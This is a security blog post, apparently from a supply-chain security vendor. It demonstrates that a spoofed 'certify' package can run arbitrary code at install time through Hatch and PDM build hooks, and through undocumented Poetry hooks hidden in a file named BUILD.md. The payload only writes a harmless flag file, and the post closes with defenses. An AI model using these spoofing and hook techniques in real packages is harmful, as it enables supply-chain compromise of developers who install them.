Modern Python Build Hooks

Modern Python Build Hooks
Photo by Tengyart / Unsplash
πŸ—£οΈ
This is part of a series of posts examining the methods malicious Python code gains execution.

This blog series has already shown the common infection method for most Python malware is allowing source distributions when installing packages. We’ve also seen most malware gain execution by running from the setup.py file. That’s old news and more likely to be noticed. Attackers want to be modern, too. Isn’t there a way they can gain arbitrary code execution with the pyproject.toml file? It turns out there is.

Some build backends provide build hooks for modifying the inputs and outputs of source and built distribution creation. Hatch and PDM are two examples of package managers with related build backends offering build hook functionality. There may be others (see addendum for Poetry at the end of this post). Hatch provides a popular build backend in hatchling so we’ll start with it to demonstrate the process.

Spoofing pyproject.toml projects

We’ll start with the same certifi package that has been used throughout this series. To show just how useful Hatch is for package management, the process will be shown from the beginning. The process for spoofing pyproject.toml projects will mimic the one used in the post showing how to do so for setup.py projects.

First, be sure hatch is installed. I prefer the pipx method. Then, clone the repository for the legitimate certifi package and switch into the new directory:

❯ pipx install hatch
  installed package hatch 1.10.0, installed using Python 3.12.3
  These apps are now globally available
    - hatch
done! ✨ 🌟 ✨

❯ git clone git@github.com:certifi/python-certifi.git python-certify
Cloning into 'python-certify'...
remote: Enumerating objects: 934, done.
remote: Counting objects: 100% (278/278), done.
remote: Compressing objects: 100% (127/127), done.
remote: Total 934 (delta 207), reused 152 (delta 151), pack-reused 656
Receiving objects: 100% (934/934), 1.34 MiB | 668.00 KiB/s, done.
Resolving deltas: 100% (473/473), done.

Install Hatch and clone the certifi repo

Next, use Hatch to initialize the existing project. This is a nice feature since it will automatically convert the old setuptools configuration using setup.py to the modern PEP 518 pyproject.toml format, adhering to PEP 621 to boot!

## Initialize the existing project
❯ hatch --no-interactive new --init
Migrating project metadata from setuptools

## The output indicates a successful migration, but what did it do?
❯ git status --short
?? pyproject.toml

## Okay, it added a `pyproject.toml` file. Is that enough to build now?
❯ hatch build
──────────────── sdist ────────────────
dist/certifi-2024.2.2.tar.gz
──────────────── wheel ────────────────
dist/certifi-2024.2.2-py3-none-any.whl

Use Hatch to convert setup.py metadata to pyproject.toml

That was easy. A few commands and we were able to create source and built distributions from an automagically generated, standards-compliant, pyproject.toml file. However, we didn’t seek to rebuild the wheel. We want to create a spoofed package that doesn’t rely on setup.py to run our bad code. To do that, we need to make some modifications to pyproject.toml. For reference, here is the original that Hatch generated:

[build-system]
requires = ["hatchling"]
build-backend = "hatchling.build"

[project]
name = "certifi"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
license = "MPL-2.0"
requires-python = ">=3.6"
authors = [
    { name = "Kenneth Reitz", email = "me@kennethreitz.com" },
]
classifiers = [
    "Development Status :: 5 - Production/Stable",
    "Intended Audience :: Developers",
    "License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
    "Natural Language :: English",
    "Programming Language :: Python",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3 :: Only",
    "Programming Language :: Python :: 3.6",
    "Programming Language :: Python :: 3.7",
    "Programming Language :: Python :: 3.8",
    "Programming Language :: Python :: 3.9",
    "Programming Language :: Python :: 3.10",
    "Programming Language :: Python :: 3.11",
    "Programming Language :: Python :: 3.12",
]

[project.urls]
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"

[tool.hatch.version]
path = "certifi/__init__.py"

[tool.hatch.build.targets.sdist]
include = [
    "/certifi",
]

The pyproject.toml file generated by Hatch

We’ll add it to source control (git add pyproject.toml) so changes will be more obvious. The first change to make is to rename the project from certifi to certify. Hatch’s logic to automatically detect files to be included when building a wheel relies on the project name matching the file structure. Just like in the previous post about package spoofing, we want a fake distribution package while retaining the import package naming structure. To do that, we need to override the default logic and tell Hatch where to find the files. Here are the changes made in pyproject.toml to meet those goals:

❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..74d720b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,7 +3,7 @@ requires = ["hatchling"]
 build-backend = "hatchling.build"

 [project]
-name = "certifi"
+name = "certify"
 dynamic = ["version"]
 description = "Python package for providing Mozilla's CA Bundle."
 readme = "README.rst"
@@ -40,3 +40,8 @@ path = "certifi/__init__.py"
 include = [
     "/certifi",
 ]
+
+[tool.hatch.build.targets.wheel]
+packages = ["certifi"]

Diff view in pyproject.toml after spoofing changes

These changes are enough to build a spoofed package with both source and built distributions.

❯ hatch build
──────────────── sdist ────────────────
dist/certify-2024.2.2.tar.gz
──────────────── wheel ────────────────
dist/certify-2024.2.2-py3-none-any.whl

Building distributions with Hatch

Notice that the distribution package is now certify. After installation, the import package is still certifi. That’s great but it doesn’t provide much in the way of new techniques. Sure, Hatch can be used to convert setup.py projects to pyproject.toml ones, but let's crack some eggs and get messy.

Hatching evil plans

Hatch is very much a modern tool, adhering to the latest packaging standards. It eschews the legacy methods of defining metadata and package configuration in a setup.py file, which is essentially an arbitrary code execution vector. Instead, it adopts pyproject.toml as the PEP 518 compliant plaintext configuration file. There’s no way arbitrary code can run from a config file, right? Right!? You may be asking, β€œWhat about my custom package generation steps? How am I supposed to compile extensions for all the various platform types my project supports?”

Hatch has you covered. Hatch provides build hooks to get around this limitation. These build hooks are offered in the form of plugins, either third-party (i.e., more build requirements) or first-party by adhering to a reference plugin interface. The interface allows for writing code that will be executed at one or more points in the build process:

  • clean: occurs before the build process if the -c/β€”clean flag was passed to the build command, or when invoking the clean command
  • initialize: occurs immediately before each build
  • finalize: occurs immediately after each build

Additionally, Hatch provides one built-in build hook named custom. It is this hook that will be used to deliver our malicious payload since it requires the least amount of additional code. It is enabled with a single line added to the pyproject.toml configuration:

[tool.hatch.build.targets.wheel.hooks.custom]

The default configuration for this custom build hook specifies hatch_build.py as the file containing the custom implementation of the interface. The file name and/or path can be different but we’ll use the default for this example to avoid adding another line to pyproject.toml. For reference, this is now the full difference in the configuration file as compared to the one initially generated by Hatch:

❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..889ab73 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,7 +3,7 @@ requires = ["hatchling"]
 build-backend = "hatchling.build"

 [project]
-name = "certifi"
+name = "certify"
 dynamic = ["version"]
 description = "Python package for providing Mozilla's CA Bundle."
 readme = "README.rst"
@@ -40,3 +40,12 @@ path = "certifi/__init__.py"
 include = [
     "/certifi",
 ]
+
+# This section is required because the project name
+# was changed and no longer matches the package name.
+[tool.hatch.build.targets.wheel]
+packages = ["certifi"]
+
+# This empty table entry triggers execution of the
+# `hatch_build.py` module when building wheels.
+[tool.hatch.build.targets.wheel.hooks.custom]

Diff view in pyproject.toml after enabling build hooks

Next, we’ll write a minimal plugin implementation using hatch_build.py. We choose to use the initialize entry point since it is more likely to run for every build (the finalize entry point may not be called if the build fails). The β€œmalicious” code simply adds a file to a temporary directory to serve as a flag indicating when the code runs. Real malware would be more complex and likely obfuscated.

from hatchling.builders.hooks.plugin.interface import BuildHookInterface

class CustomBuildHook(BuildHookInterface):
    def initialize(self, version, build_data):
        # Code in this function will run before building
        with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
            f.write("Malware could have run here")

Build hook with "malware" in hatch_build.py

Building the source distribution with this change and using it to install the package shows that the newly added code does indeed run:

## With only two added and modified files...
❯ git status --short
AM pyproject.toml
?? hatch_build.py

## ...we can build a spoofed source distribution that
## contains those files, to be used when building a wheel
❯ hatch build --target sdist
──────────────── sdist ────────────────
dist/certify-2024.2.2.tar.gz

## Create a Python virtual environment
❯ python -m venv .venv

## ...and activate it for demo use
❯ source .venv/bin/activate

## See that there is no flag present
❯ ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory

## Installing the package does not indicate anything bad happened...
❯ python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
  Building wheel for certify (pyproject.toml) ... done
  Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164156 sha256=105c8292d17e6976de036db187899f12c0c28dd7a6cf6a31b03b6a094c718e95
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/43/8d/c9/91f4cd154b7df7fbc77d07b6d2012a4f0b9a289da49d46706d
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2

## ...but now there is a "flag.txt" file...
❯ ls -alh /private/tmp/flag.txt
-rw-r--r--  1 maxrake  wheel    27B May  2 12:57 /private/tmp/flag.txt

## ...which proves that any arbitrary code can run in "hatch_build.py"
❯ cat /private/tmp/flag.txt
Malware could have run here

Source distribution used to execute payload during wheel build step of package installation

PDM FTW

The same process works when using the build hooks offered by the pdm-backend package that comes from the PDM project. Here is what that looks like, using the same certifi package as a starting point.

## Install PDM (I prefer using pipx)
❯ pipx install pdm
  installed package pdm 2.15.1, installed using Python 3.12.3
  These apps are now globally available
    - pdm
done! ✨ 🌟 ✨

## Clone the legitimate `certifi` package repo and switch into directory
❯ git clone git@github.com:certifi/python-certifi.git python-certify-pdm
Cloning into 'python-certify-pdm'...
remote: Enumerating objects: 971, done.
remote: Counting objects: 100% (314/314), done.
remote: Compressing objects: 100% (143/143), done.
remote: Total 971 (delta 226), reused 196 (delta 171), pack-reused 657
Receiving objects: 100% (971/971), 1.35 MiB | 5.91 MiB/s, done.
Resolving deltas: 100% (492/492), done.

## Use Hatch to migrate from `setup.py` to `pyproject.toml`
❯ hatch --no-interactive new --init
Migrating project metadata from setuptools

## Add the configuration file to source control, for later diffs
❯ git add pyproject.toml

Install PDM and use Hatch to initiate the spoofed project

At this point, the pyproject.toml file looks like the one from before, when Hatch was used. It needs a few adjustments to be used with PDM. For starters, the build backend has to change. Plus, some PEP 621 metadata fields need to be updated to match the expected format even though the content is fine. After those modifications, the pyproject.toml file looks like this:

[build-system]
requires = ["pdm-backend"]
build-backend = "pdm.backend"

[project]
name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
license = { text = "MPL-2.0" }
requires-python = ">=3.6"
authors = [
    { name = "Kenneth Reitz", email = "me@kennethreitz.com" },
]
classifiers = [
    "Development Status :: 5 - Production/Stable",
    "Intended Audience :: Developers",
    "License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
    "Natural Language :: English",
    "Programming Language :: Python",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3 :: Only",
    "Programming Language :: Python :: 3.6",
    "Programming Language :: Python :: 3.7",
    "Programming Language :: Python :: 3.8",
    "Programming Language :: Python :: 3.9",
    "Programming Language :: Python :: 3.10",
    "Programming Language :: Python :: 3.11",
    "Programming Language :: Python :: 3.12",
]

[project.urls]
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"

[tool.pdm.version]
source = "file"
path = "certifi/__init__.py"

PDM and project configuration in pyproject.toml

Here is the difference from the one generated by Hatch:

❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..29302fd 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,13 +1,13 @@
 [build-system]
-requires = ["hatchling"]
-build-backend = "hatchling.build"
+requires = ["pdm-backend"]
+build-backend = "pdm.backend"

 [project]
-name = "certifi"
+name = "certify"
 dynamic = ["version"]
 description = "Python package for providing Mozilla's CA Bundle."
 readme = "README.rst"
-license = "MPL-2.0"
+license = { text = "MPL-2.0" }
 requires-python = ">=3.6"
 authors = [
     { name = "Kenneth Reitz", email = "me@kennethreitz.com" },
@@ -33,10 +33,6 @@ classifiers = [
 Homepage = "https://github.com/certifi/python-certifi"
 Source = "https://github.com/certifi/python-certifi"

-[tool.hatch.version]
+[tool.pdm.version]
+source = "file"
 path = "certifi/__init__.py"
-
-[tool.hatch.build.targets.sdist]
-include = [
-    "/certifi",
-]

Diff view in pyproject.toml after converting metadata from Hatch to PDM specifications

Enabling PDM build hooks is as easy as creating a pdm_build.py module in the root of the project directory and populating it with one or more of the defined functions from the build hook interface API. The module name can be different but requires an additional entry in the pyproject.toml configuration. This is a minimal pdm_build.py implementation used to plant our flag for wheel builds:

def pdm_build_hook_enabled(context):
    # Only enable for wheel builds
    return context.target == "wheel"

def pdm_build_initialize(context):
    # Code in this function will run before building
    with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
        f.write("Malware could have run here")

Build hooks with "malware" in pdm_build.py

Building the source distribution with this change and using it to install the package shows that the newly added code does indeed run. The demonstration steps are essentially the same as for Hatch, but this time the virtual environment is created before building the source distribution so PDM will use it instead of creating one.

## There are only two added and modified files
❯ git status --short
AM pyproject.toml
?? pdm_build.py

## Create a Python virtual environment and activate it for use
❯ python -m venv .venv && source .venv/bin/activate

## We can build a spoofed source distribution containing
## the new files, to be used when building a wheel
❯ pdm build --no-wheel --quiet
Building sdist...
INFO: Inside an active virtualenv /Users/maxrake/dev/phylum/python-certify-pdm/.venv, reusing it.
Set env var PDM_IGNORE_ACTIVE_VENV to ignore it.
Built sdist at /Users/maxrake/dev/phylum/python-certify-pdm/dist/certify-2024.2.2.tar.gz

## See that there is no flag present
❯ ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory

## Installing the package does not indicate anything bad happened...
❯ python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
  Building wheel for certify (pyproject.toml) ... done
  Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164138 sha256=c3b6cc5f67b526e88e125f1b806ac3fb9157b93f150c94c7e8f2a9ac7adb214a
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/8e/48/d3/1f7efdb8dc7d9332f1d58da9b9ac3e9659c43b286dccde8584
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2

## ...but now there is a "flag.txt" file...
❯ ls -alh /private/tmp/flag.txt
-rw-r--r--  1 maxrake  wheel    27B May  6 11:28 /private/tmp/flag.txt

## ...which proves that any arbitrary code can run in "pdm_build.py"
❯ cat /private/tmp/flag.txt
Malware could have run here

Source distribution used to execute payload during wheel build step of package installation

Modern hard hats and safety goggles

Once again, it has been shown that allowing source distributions to be installed anywhere in the fully resolved dependency chain introduces risk. The risk of executing arbitrary code contained within one of those source distributions is not limited to legacy setup.py structures. Modern package managers like Hatch and PDM allow for build hooks in modern pyproject.toml projects. Installing a source distribution means building the wheel that is ultimately installed, which means the hook code in hatch_build.py, pdm_build.py, or any custom-configured module will run.

If possible, disallow all source distributions during install. The pip documentation provides a guide for secure installs that recommends passing --only-binary :all: to meet the goal. It appears that Poetry allows configurations to specify no binaries (i.e., wheels) but no such option for source distributions exists. Other package installers likely suffer the same limitation.

--cta--

One countermeasure to this class of attack is to run all package installation actions through an application sandbox. This restricts the actions available to only those filesystem and network operations deemed legitimate and effectively neuters malicious code. Phylum offers this protection in the form of the open-source Birdcage sandbox, which is baked into the Phylum CLI and can be used for Python developers using pip or Poetry with the matching official extensions.

Addendum: Undocumented Poetry build hooks

ℹ️
Since the feature is undocumented and likely to change at any time, this proof of concept is included only as an addendum.

It is indeed possible to include build hooks with Poetry using either the legacy poetry build backend or the modern poetry-core one. This is an undocumented feature but has existed since the earliest days of the project. For some background and insights about the inner workings of this feature, reference these GitHub issues from the Poetry project:

  • The eleventh issue ever, first talking about this feature
  • An issue requesting the feature to be stabilized and documented
  • An issue showing an alternate configuration for the newer poetry-core build backend

To demonstrate the use of Poetry for malicious purposes, we alter our very own phylum project and spoof it as phylum-ci, but with an added Python module disguised as a Markdown file.

## Clone the `phylum` package and switch into directory
❯ git remote -v
origin	git@github.com:phylum-dev/phylum-ci.git (fetch)
origin	git@github.com:phylum-dev/phylum-ci.git (push)

## See that only two files need to be modified/added
❯ git status --short
 M pyproject.toml
?? BUILD.md

## Spoof the package by changing the name to `phylum-ci`
## and activate a build hook by specifying a `build` file
❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index ca0326a..6cfb131 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -5,8 +5,9 @@ requires = ["poetry-core>=1.8.1"]
 build-backend = "poetry.core.masonry.api"

 [tool.poetry]
-name = "phylum"
+name = "phylum-ci"
 version = "0.44.0"
+build = "BUILD.md"
 description = "Utilities for integrating Phylum into CI pipelines (and beyond)"
 license = "GPL-3.0-or-later"
 authors = ["Phylum, Inc. <engineering@phylum.io>"]

## The build file can be named anything! We seek to blend in here.
## It still needs to contain Python code and a `build()` function.
❯ cat BUILD.md
def build():
    with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
        f.write("Malware could have run here")

if __name__ == "__main__":
    build()

## Build the source distribution
❯ poetry build --format=sdist
Preparing build environment with build-system requirements poetry-core>=1.8.1
Building phylum-ci (0.44.0)
  - Building sdist
  - Built phylum_ci-0.44.0.tar.gz

## Create a virtual environment and activate it
❯ python -m venv delme_venv && source delme_venv/bin/activate

## Ensure the pip package cache is empty
❯ python -m pip cache purge
Files removed: 3

## Show that there is no flag present
❯ ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory

## Install the spoofed package
❯ python -m pip install dist/phylum_ci-0.44.0.tar.gz
Processing ./dist/phylum_ci-0.44.0.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting cryptography (from phylum-ci==0.44.0)
  Downloading cryptography-42.0.7-cp39-abi3-macosx_10_12_universal2.whl.metadata (5.3 kB)
---TRIMMED-FOR-BREVITY---
Building wheels for collected packages: phylum-ci
  Building wheel for phylum-ci (pyproject.toml) ... done
  Created wheel for phylum-ci: filename=phylum_ci-0.44.0-cp312-cp312-macosx_14_0_arm64.whl size=85083 sha256=8988365340f735e504d06a713cf79e7d5c17c3fe431d15553306246202559aa4
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/47/cb/ad/69829b41685d144709dd92559c13e18e25d141402d0b40573d
Successfully built phylum-ci
Installing collected packages: urllib3, ruamel.yaml.clib, pygments, pycparser, packaging, mdurl, idna, charset-normalizer, certifi, ruamel.yaml, requests, markdown-it-py, cffi, rich, cryptography, phylum-ci
Successfully installed certifi-2024.2.2 cffi-1.16.0 charset-normalizer-3.3.2 cryptography-42.0.7 idna-3.7 markdown-it-py-3.0.0 mdurl-0.1.2 packaging-24.0 phylum-ci-0.44.0 pycparser-2.22 pygments-2.18.0 requests-2.31.0 rich-13.7.1 ruamel.yaml-0.18.6 ruamel.yaml.clib-0.2.8 urllib3-2.2.1

## See that the flag has been planted...
❯ ls -alh /private/tmp/flag.txt
-rw-r--r--  1 maxrake  wheel    27B May  8 15:33 /private/tmp/flag.txt

## ...proving that arbitrary code execution is possible.
❯ cat /private/tmp/flag.txt
Malware could have run here

Executing arbitrary code disguised as a Markdown file by using Poetry build hooks

Charles Coggins

Charles Coggins

Senior Software Engineer, responsible for integrations and author of the "phylum" Python package. Documentation and quality champion, runner, baseball and scout dad, pod-faster, and lover of outdoors.